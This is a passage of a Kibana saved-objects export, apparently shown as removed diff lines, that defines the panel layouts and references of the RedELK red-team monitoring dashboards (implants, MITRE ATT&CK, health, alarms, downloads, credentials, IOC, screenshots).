"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_a5e43e90-aa23-403a-9167-bfe8aff7fb6c\"},{\"version\":\"7.8.0\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":54,\"w\":48,\"h\":19,\"i\":\"b9915fcd-f22e-4326-986a-25684f947b79\"},\"panelIndex\":\"b9915fcd-f22e-4326-986a-25684f947b79\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_b9915fcd-f22e-4326-986a-25684f947b79\"}]", "refreshInterval": {"pause": false, "value": 30000}, "timeFrom": "now-30d", "timeRestore": true, "timeTo": "now", "title": "RedELK - Implants dashboard", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "117dbba0-c6f5-11e8-a9c6-cd307b96b1ba", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", "type": "index-pattern"}, {"id": "e12434d0-b8e8-11e8-94dd-171ae5c1fd1a", "name": "1:panel_1", "type": "visualization"}, {"id": "88003df0-b8ec-11e8-94dd-171ae5c1fd1a", "name": "2:panel_2", "type": "visualization"}, {"id": "10dcc4a0-b8e7-11e8-94dd-171ae5c1fd1a", "name": "3:panel_3", "type": "visualization"}, {"id": "f0dcbda0-b8e5-11e8-94dd-171ae5c1fd1a", "name": "4:panel_4", "type": "visualization"}, {"id": "a1efc620-b8e4-11e8-94dd-171ae5c1fd1a", "name": "5:panel_5", "type": "visualization"}, {"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "a5e43e90-aa23-403a-9167-bfe8aff7fb6c:panel_a5e43e90-aa23-403a-9167-bfe8aff7fb6c", "type": "visualization"}, {"id": "68e8e870-b6aa-11e8-bc1a-cf8fa3255855", "name": "b9915fcd-f22e-4326-986a-25684f947b79:panel_b9915fcd-f22e-4326-986a-25684f947b79", "type": "search"}], "sort": [1642171876916, 56], "type": "dashboard", "version": "1"} -{"attributes": {"description": "MITRE ATT&CK dashboard showing TTPs used (SIEM detection must be configured first)", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "optionsJSON": "{\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":2,\"w\":21,\"h\":17,\"i\":\"e4271670-160e-444d-bb78-46ae1e1c7339\"},\"panelIndex\":\"e4271670-160e-444d-bb78-46ae1e1c7339\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"MITRE ATT&CK Tactics\",\"panelRefName\":\"panel_e4271670-160e-444d-bb78-46ae1e1c7339\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":21,\"y\":2,\"w\":27,\"h\":17,\"i\":\"6b3738e3-3bd8-417f-866a-f7c990b0b6f8\"},\"panelIndex\":\"6b3738e3-3bd8-417f-866a-f7c990b0b6f8\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"MITRE ATT&CK Techniques\",\"panelRefName\":\"panel_6b3738e3-3bd8-417f-866a-f7c990b0b6f8\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":19,\"w\":24,\"h\":15,\"i\":\"de3ced26-2a55-43f5-af28-dc5c2b967c29\"},\"panelIndex\":\"de3ced26-2a55-43f5-af28-dc5c2b967c29\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_de3ced26-2a55-43f5-af28-dc5c2b967c29\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":19,\"w\":24,\"h\":15,\"i\":\"38e24827-8707-4583-805a-98e4138495a7\"},\"panelIndex\":\"38e24827-8707-4583-805a-98e4138495a7\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_38e24827-8707-4583-805a-98e4138495a7\"},{\"version\":\"7.8.0\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":34,\"w\":48,\"h\":15,\"i\":\"60dc249a-1ad0-456c-850b-95c77ea0bc18\"},\"panelIndex\":\"60dc249a-1ad0-456c-850b-95c77ea0bc18\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_60dc249a-1ad0-456c-850b-95c77ea0bc18\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":0,\"w\":48,\"h\":2,\"i\":\"3b895da0-50d0-49e0-a18d-790fd2dddaaa\"},\"panelIndex\":\"3b895da0-50d0-49e0-a18d-790fd2dddaaa\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_3b895da0-50d0-49e0-a18d-790fd2dddaaa\"}]", "timeRestore": false, "title": "RedELK - MITRE ATT&CK", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "3ed7a630-d051-11ea-9301-a30a04251ae9", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "ff3c3b80-d050-11ea-9301-a30a04251ae9", "name": "e4271670-160e-444d-bb78-46ae1e1c7339:panel_e4271670-160e-444d-bb78-46ae1e1c7339", "type": "visualization"}, {"id": "abdcd940-d050-11ea-9301-a30a04251ae9", "name": "6b3738e3-3bd8-417f-866a-f7c990b0b6f8:panel_6b3738e3-3bd8-417f-866a-f7c990b0b6f8", "type": "visualization"}, {"id": "2f5a2760-d050-11ea-9301-a30a04251ae9", "name": "de3ced26-2a55-43f5-af28-dc5c2b967c29:panel_de3ced26-2a55-43f5-af28-dc5c2b967c29", "type": "visualization"}, {"id": "231792d0-d050-11ea-9301-a30a04251ae9", "name": "38e24827-8707-4583-805a-98e4138495a7:panel_38e24827-8707-4583-805a-98e4138495a7", "type": "visualization"}, {"id": "dddbba20-d04f-11ea-9301-a30a04251ae9", "name": "60dc249a-1ad0-456c-850b-95c77ea0bc18:panel_60dc249a-1ad0-456c-850b-95c77ea0bc18", "type": "search"}, {"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "3b895da0-50d0-49e0-a18d-790fd2dddaaa:panel_3b895da0-50d0-49e0-a18d-790fd2dddaaa", "type": "visualization"}], "sort": [1642171876916, 63], "type": "dashboard", "version": "1"} -{"attributes": {"description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "optionsJSON": "{\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":0,\"w\":48,\"h\":2,\"i\":\"5f3b82fd-613e-460e-a5a3-b7a9c9036060\"},\"panelIndex\":\"5f3b82fd-613e-460e-a5a3-b7a9c9036060\",\"embeddableConfig\":{\"hidePanelTitles\":true,\"enhancements\":{}},\"panelRefName\":\"panel_5f3b82fd-613e-460e-a5a3-b7a9c9036060\"},{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":2,\"w\":48,\"h\":2,\"i\":\"cf429e43-5aaf-4e6b-8c3b-04c1bbd998b2\"},\"panelIndex\":\"cf429e43-5aaf-4e6b-8c3b-04c1bbd998b2\",\"embeddableConfig\":{\"hidePanelTitles\":true,\"enhancements\":{}},\"panelRefName\":\"panel_cf429e43-5aaf-4e6b-8c3b-04c1bbd998b2\"},{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":4,\"w\":16,\"h\":7,\"i\":\"cd30bef4-7955-437a-adaf-317839c35931\"},\"panelIndex\":\"cd30bef4-7955-437a-adaf-317839c35931\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_cd30bef4-7955-437a-adaf-317839c35931\"},{\"version\":\"7.10.0\",\"type\":\"search\",\"gridData\":{\"x\":16,\"y\":4,\"w\":21,\"h\":18,\"i\":\"cc62352b-f1ed-47fb-9687-d51a44693d13\"},\"panelIndex\":\"cc62352b-f1ed-47fb-9687-d51a44693d13\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_cc62352b-f1ed-47fb-9687-d51a44693d13\"},{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"x\":37,\"y\":4,\"w\":11,\"h\":18,\"i\":\"1d8af391-0559-412f-a001-12acc85b49ab\"},\"panelIndex\":\"1d8af391-0559-412f-a001-12acc85b49ab\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_1d8af391-0559-412f-a001-12acc85b49ab\"},{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":11,\"w\":16,\"h\":11,\"i\":\"cd45ce11-0279-476b-90c3-bd5733193a72\"},\"panelIndex\":\"cd45ce11-0279-476b-90c3-bd5733193a72\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_cd45ce11-0279-476b-90c3-bd5733193a72\"},{\"version\":\"7.10.0\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":22,\"w\":48,\"h\":16,\"i\":\"aa8ee839-556c-47ce-81af-451090b86f71\"},\"panelIndex\":\"aa8ee839-556c-47ce-81af-451090b86f71\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_aa8ee839-556c-47ce-81af-451090b86f71\"}]", "refreshInterval": {"pause": true, "value": 0}, "timeFrom": "now-15y", "timeRestore": true, "timeTo": "now", "title": "RedELK - Health", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "509e6a80-926a-11eb-a753-9da683898c26", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "5f3b82fd-613e-460e-a5a3-b7a9c9036060:panel_5f3b82fd-613e-460e-a5a3-b7a9c9036060", "type": "visualization"}, {"id": "45491770-0886-11eb-a2d2-171dc8941414", "name": "cf429e43-5aaf-4e6b-8c3b-04c1bbd998b2:panel_cf429e43-5aaf-4e6b-8c3b-04c1bbd998b2", "type": "visualization"}, {"id": "20fac240-926c-11eb-a753-9da683898c26", "name": "cd30bef4-7955-437a-adaf-317839c35931:panel_cd30bef4-7955-437a-adaf-317839c35931", "type": "visualization"}, {"id": "87530b40-9269-11eb-a753-9da683898c26", "name": "cc62352b-f1ed-47fb-9687-d51a44693d13:panel_cc62352b-f1ed-47fb-9687-d51a44693d13", "type": "search"}, {"id": "2f971ac0-926b-11eb-a753-9da683898c26", "name": "1d8af391-0559-412f-a001-12acc85b49ab:panel_1d8af391-0559-412f-a001-12acc85b49ab", "type": "visualization"}, {"id": "2f77a150-926a-11eb-a753-9da683898c26", "name": "cd45ce11-0279-476b-90c3-bd5733193a72:panel_cd45ce11-0279-476b-90c3-bd5733193a72", "type": "visualization"}, {"id": "654f76a0-9269-11eb-a753-9da683898c26", "name": "aa8ee839-556c-47ce-81af-451090b86f71:panel_aa8ee839-556c-47ce-81af-451090b86f71", "type": "search"}], "sort": [1642171876916, 71], "type": "dashboard", "version": "1"} -{"attributes": {"description": "RedELK alarms dashboard", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "optionsJSON": "{\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":0,\"w\":48,\"h\":2,\"i\":\"80f94a01-4e80-42c2-b67e-971bab6e0526\"},\"panelIndex\":\"80f94a01-4e80-42c2-b67e-971bab6e0526\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_80f94a01-4e80-42c2-b67e-971bab6e0526\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":2,\"w\":18,\"h\":11,\"i\":\"74b481ca-ae10-4039-b6bf-474b5a409c0e\"},\"panelIndex\":\"74b481ca-ae10-4039-b6bf-474b5a409c0e\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Alarmed IOC over time\",\"panelRefName\":\"panel_74b481ca-ae10-4039-b6bf-474b5a409c0e\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":18,\"y\":2,\"w\":6,\"h\":11,\"i\":\"13abf5b9-28bf-4d51-9c63-2416603499e7\"},\"panelIndex\":\"13abf5b9-28bf-4d51-9c63-2416603499e7\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_13abf5b9-28bf-4d51-9c63-2416603499e7\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":2,\"w\":6,\"h\":11,\"i\":\"e146bc43-4ec7-4fbb-8dcf-3df505b52932\"},\"panelIndex\":\"e146bc43-4ec7-4fbb-8dcf-3df505b52932\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_e146bc43-4ec7-4fbb-8dcf-3df505b52932\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":30,\"y\":2,\"w\":18,\"h\":11,\"i\":\"c8ae192f-f081-49eb-8e60-3122d0377314\"},\"panelIndex\":\"c8ae192f-f081-49eb-8e60-3122d0377314\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Alarmed traffic over time\",\"panelRefName\":\"panel_c8ae192f-f081-49eb-8e60-3122d0377314\"},{\"version\":\"7.8.0\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":13,\"w\":48,\"h\":14,\"i\":\"b95813af-9600-4e44-93de-9acfaa6f911c\"},\"panelIndex\":\"b95813af-9600-4e44-93de-9acfaa6f911c\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Alarmed IOC\",\"panelRefName\":\"panel_b95813af-9600-4e44-93de-9acfaa6f911c\"},{\"version\":\"7.8.0\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":27,\"w\":48,\"h\":17,\"i\":\"67fd9bda-6d1a-4089-a588-b683ad113558\"},\"panelIndex\":\"67fd9bda-6d1a-4089-a588-b683ad113558\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Alarmed traffic\",\"panelRefName\":\"panel_67fd9bda-6d1a-4089-a588-b683ad113558\"}]", "timeRestore": false, "title": "RedELK - Alarms dashboard", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "53b69200-d4e3-11ea-9301-a30a04251ae9", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "80f94a01-4e80-42c2-b67e-971bab6e0526:panel_80f94a01-4e80-42c2-b67e-971bab6e0526", "type": "visualization"}, {"id": "3ae6c0c0-d4e2-11ea-9301-a30a04251ae9", "name": "74b481ca-ae10-4039-b6bf-474b5a409c0e:panel_74b481ca-ae10-4039-b6bf-474b5a409c0e", "type": "visualization"}, {"id": "7d850b30-d4e2-11ea-9301-a30a04251ae9", "name": "13abf5b9-28bf-4d51-9c63-2416603499e7:panel_13abf5b9-28bf-4d51-9c63-2416603499e7", "type": "visualization"}, {"id": "62b61920-d4e2-11ea-9301-a30a04251ae9", "name": "e146bc43-4ec7-4fbb-8dcf-3df505b52932:panel_e146bc43-4ec7-4fbb-8dcf-3df505b52932", "type": "visualization"}, {"id": "f7141500-d4e1-11ea-9301-a30a04251ae9", "name": "c8ae192f-f081-49eb-8e60-3122d0377314:panel_c8ae192f-f081-49eb-8e60-3122d0377314", "type": "visualization"}, {"id": "10da2290-d4e2-11ea-9301-a30a04251ae9", "name": "b95813af-9600-4e44-93de-9acfaa6f911c:panel_b95813af-9600-4e44-93de-9acfaa6f911c", "type": "search"}, {"id": "658d7180-d4e1-11ea-9301-a30a04251ae9", "name": "67fd9bda-6d1a-4089-a588-b683ad113558:panel_67fd9bda-6d1a-4089-a588-b683ad113558", "type": "search"}], "sort": [1642171876916, 79], "type": "dashboard", "version": "1"} -{"attributes": {"description": "RedELK downloads dashboard", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "optionsJSON": "{\"useMargins\":true,\"hidePanelTitles\":false}", "panelsJSON": "[{\"version\":\"7.16.3\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":0,\"w\":48,\"h\":3,\"i\":\"80f94a01-4e80-42c2-b67e-971bab6e0526\"},\"panelIndex\":\"80f94a01-4e80-42c2-b67e-971bab6e0526\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_80f94a01-4e80-42c2-b67e-971bab6e0526\"},{\"version\":\"7.16.3\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":3,\"w\":24,\"h\":11,\"i\":\"8375955c-eab4-48d9-ac8a-e4de3dd6fab2\"},\"panelIndex\":\"8375955c-eab4-48d9-ac8a-e4de3dd6fab2\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_8375955c-eab4-48d9-ac8a-e4de3dd6fab2\"},{\"version\":\"7.16.3\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":3,\"w\":7,\"h\":11,\"i\":\"1e1864e7-1cbf-41bf-a9a5-8afadce8cadf\"},\"panelIndex\":\"1e1864e7-1cbf-41bf-a9a5-8afadce8cadf\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_1e1864e7-1cbf-41bf-a9a5-8afadce8cadf\"},{\"version\":\"7.16.3\",\"type\":\"visualization\",\"gridData\":{\"x\":31,\"y\":3,\"w\":17,\"h\":11,\"i\":\"55aca97f-b1f0-43b1-af44-756fe59be5fc\"},\"panelIndex\":\"55aca97f-b1f0-43b1-af44-756fe59be5fc\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_55aca97f-b1f0-43b1-af44-756fe59be5fc\"},{\"version\":\"7.16.3\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":14,\"w\":48,\"h\":16,\"i\":\"9a987436-c698-4236-9b92-bfab81de8cc1\"},\"panelIndex\":\"9a987436-c698-4236-9b92-bfab81de8cc1\",\"embeddableConfig\":{\"sort\":[\"@timestamp\",\"desc\",[\"@timestamp\",\"desc\"]],\"enhancements\":{}},\"panelRefName\":\"panel_9a987436-c698-4236-9b92-bfab81de8cc1\"}]", "timeRestore": false, "title": "RedELK - Downloads dashboard", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "643de010-d04c-11ea-9301-a30a04251ae9", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "80f94a01-4e80-42c2-b67e-971bab6e0526:panel_80f94a01-4e80-42c2-b67e-971bab6e0526", "type": "visualization"}, {"id": "85446c80-d04b-11ea-9301-a30a04251ae9", "name": "8375955c-eab4-48d9-ac8a-e4de3dd6fab2:panel_8375955c-eab4-48d9-ac8a-e4de3dd6fab2", "type": "visualization"}, {"id": "b5beb3c0-d04b-11ea-9301-a30a04251ae9", "name": "1e1864e7-1cbf-41bf-a9a5-8afadce8cadf:panel_1e1864e7-1cbf-41bf-a9a5-8afadce8cadf", "type": "visualization"}, {"id": "41f94ad0-d04c-11ea-9301-a30a04251ae9", "name": "55aca97f-b1f0-43b1-af44-756fe59be5fc:panel_55aca97f-b1f0-43b1-af44-756fe59be5fc", "type": "visualization"}, {"id": "26ba4cb0-0f73-11e9-8e1e-a16db980e11e", "name": "9a987436-c698-4236-9b92-bfab81de8cc1:panel_9a987436-c698-4236-9b92-bfab81de8cc1", "type": "search"}], "sort": [1643016103992, 297], "type": "dashboard", "version": "1"} -{"attributes": {"description": "RedELK credentials dashboard", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "optionsJSON": "{\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"h\":2,\"i\":\"80f94a01-4e80-42c2-b67e-971bab6e0526\",\"w\":48,\"x\":0,\"y\":0},\"panelIndex\":\"80f94a01-4e80-42c2-b67e-971bab6e0526\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_80f94a01-4e80-42c2-b67e-971bab6e0526\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":2,\"w\":24,\"h\":11,\"i\":\"f26413a8-7bc3-4d63-8e2e-02d1c8e06b51\"},\"panelIndex\":\"f26413a8-7bc3-4d63-8e2e-02d1c8e06b51\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Credentials over time\",\"panelRefName\":\"panel_f26413a8-7bc3-4d63-8e2e-02d1c8e06b51\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":2,\"w\":7,\"h\":11,\"i\":\"8c5ea210-ef6d-47a3-958b-16ccc6006582\"},\"panelIndex\":\"8c5ea210-ef6d-47a3-958b-16ccc6006582\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Total credentials\",\"panelRefName\":\"panel_8c5ea210-ef6d-47a3-958b-16ccc6006582\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":31,\"y\":2,\"w\":17,\"h\":11,\"i\":\"b98cc0b8-ee93-4d34-b458-cd311eb995ea\"},\"panelIndex\":\"b98cc0b8-ee93-4d34-b458-cd311eb995ea\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Credentials realms\",\"panelRefName\":\"panel_b98cc0b8-ee93-4d34-b458-cd311eb995ea\"},{\"version\":\"7.8.0\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":13,\"w\":48,\"h\":19,\"i\":\"77f94499-3c4b-49c0-8379-62d38f4d7d8e\"},\"panelIndex\":\"77f94499-3c4b-49c0-8379-62d38f4d7d8e\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_77f94499-3c4b-49c0-8379-62d38f4d7d8e\"}]", "timeRestore": false, "title": "RedELK - Credentials dashboard", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "82b865a0-d318-11ea-9301-a30a04251ae9", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "80f94a01-4e80-42c2-b67e-971bab6e0526:panel_80f94a01-4e80-42c2-b67e-971bab6e0526", "type": "visualization"}, {"id": "ab609c60-d319-11ea-9301-a30a04251ae9", "name": "f26413a8-7bc3-4d63-8e2e-02d1c8e06b51:panel_f26413a8-7bc3-4d63-8e2e-02d1c8e06b51", "type": "visualization"}, {"id": "dcf86190-d319-11ea-9301-a30a04251ae9", "name": "8c5ea210-ef6d-47a3-958b-16ccc6006582:panel_8c5ea210-ef6d-47a3-958b-16ccc6006582", "type": "visualization"}, {"id": "ff4497f0-d319-11ea-9301-a30a04251ae9", "name": "b98cc0b8-ee93-4d34-b458-cd311eb995ea:panel_b98cc0b8-ee93-4d34-b458-cd311eb995ea", "type": "visualization"}, {"id": "3fabe620-6c38-11ea-97d6-55783aed877a", "name": "77f94499-3c4b-49c0-8379-62d38f4d7d8e:panel_77f94499-3c4b-49c0-8379-62d38f4d7d8e", "type": "search"}], "sort": [1642171876916, 85], "type": "dashboard", "version": "1"} -{"attributes": {"description": "RedELK IOC dashboard", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "optionsJSON": "{\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"h\":2,\"i\":\"80f94a01-4e80-42c2-b67e-971bab6e0526\",\"w\":48,\"x\":0,\"y\":0},\"panelIndex\":\"80f94a01-4e80-42c2-b67e-971bab6e0526\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_80f94a01-4e80-42c2-b67e-971bab6e0526\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"h\":11,\"i\":\"dfd53850-c595-4597-bbb5-ea03fc22e880\",\"w\":24,\"x\":0,\"y\":2},\"panelIndex\":\"dfd53850-c595-4597-bbb5-ea03fc22e880\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"IOC over time\",\"panelRefName\":\"panel_dfd53850-c595-4597-bbb5-ea03fc22e880\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"h\":11,\"i\":\"f13deeb7-53dc-41af-9de0-486d7a171916\",\"w\":17,\"x\":31,\"y\":2},\"panelIndex\":\"f13deeb7-53dc-41af-9de0-486d7a171916\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"IOC Types\",\"panelRefName\":\"panel_f13deeb7-53dc-41af-9de0-486d7a171916\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"h\":11,\"i\":\"133e1bfa-8bac-4ad1-92be-6c4cdf9dfd70\",\"w\":7,\"x\":24,\"y\":2},\"panelIndex\":\"133e1bfa-8bac-4ad1-92be-6c4cdf9dfd70\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_133e1bfa-8bac-4ad1-92be-6c4cdf9dfd70\"},{\"version\":\"7.8.0\",\"type\":\"search\",\"gridData\":{\"h\":19,\"i\":\"d492599d-f662-450b-9982-54ab7db9f174\",\"w\":48,\"x\":0,\"y\":13},\"panelIndex\":\"d492599d-f662-450b-9982-54ab7db9f174\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_d492599d-f662-450b-9982-54ab7db9f174\"}]", "timeRestore": false, "title": "RedELK - IOC dashboard", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "86643e90-d4e4-11ea-9301-a30a04251ae9", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "80f94a01-4e80-42c2-b67e-971bab6e0526:panel_80f94a01-4e80-42c2-b67e-971bab6e0526", "type": "visualization"}, {"id": "057076f0-d4e4-11ea-9301-a30a04251ae9", "name": "dfd53850-c595-4597-bbb5-ea03fc22e880:panel_dfd53850-c595-4597-bbb5-ea03fc22e880", "type": "visualization"}, {"id": "3729cde0-d4e4-11ea-9301-a30a04251ae9", "name": "f13deeb7-53dc-41af-9de0-486d7a171916:panel_f13deeb7-53dc-41af-9de0-486d7a171916", "type": "visualization"}, {"id": "5ffe8850-d4e4-11ea-9301-a30a04251ae9", "name": "133e1bfa-8bac-4ad1-92be-6c4cdf9dfd70:panel_133e1bfa-8bac-4ad1-92be-6c4cdf9dfd70", "type": "visualization"}, {"id": "4c003e20-b6aa-11e8-bc1a-cf8fa3255855", "name": "d492599d-f662-450b-9982-54ab7db9f174:panel_d492599d-f662-450b-9982-54ab7db9f174", "type": "search"}], "sort": [1642171876916, 91], "type": "dashboard", "version": "1"} -{"attributes": {"description": "RedELK screenshots dashboard", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "optionsJSON": "{\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":0,\"w\":48,\"h\":2,\"i\":\"80f94a01-4e80-42c2-b67e-971bab6e0526\"},\"panelIndex\":\"80f94a01-4e80-42c2-b67e-971bab6e0526\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_80f94a01-4e80-42c2-b67e-971bab6e0526\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":2,\"w\":24,\"h\":11,\"i\":\"d4eb5dce-3894-4599-8c17-042fc067d58c\"},\"panelIndex\":\"d4eb5dce-3894-4599-8c17-042fc067d58c\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Screenshots over time\",\"panelRefName\":\"panel_d4eb5dce-3894-4599-8c17-042fc067d58c\"},{\"version\":\"7.8.0\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":13,\"w\":48,\"h\":19,\"i\":\"1db7741d-210a-4331-b1cb-affc6ac1334e\"},\"panelIndex\":\"1db7741d-210a-4331-b1cb-affc6ac1334e\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_1db7741d-210a-4331-b1cb-affc6ac1334e\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":2,\"w\":7,\"h\":11,\"i\":\"3e93acdc-89b4-45ad-9b5d-a3a67b55bdb0\"},\"panelIndex\":\"3e93acdc-89b4-45ad-9b5d-a3a67b55bdb0\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Total screenshots\",\"panelRefName\":\"panel_3e93acdc-89b4-45ad-9b5d-a3a67b55bdb0\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":31,\"y\":2,\"w\":17,\"h\":11,\"i\":\"66403011-8fb6-402f-b9b6-5f503d6df704\"},\"panelIndex\":\"66403011-8fb6-402f-b9b6-5f503d6df704\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Screenshots target users\",\"panelRefName\":\"panel_66403011-8fb6-402f-b9b6-5f503d6df704\"}]", "timeRestore": false, "title": "RedELK - Screenshots dashboard", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "a2dcebf0-d316-11ea-9301-a30a04251ae9", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": 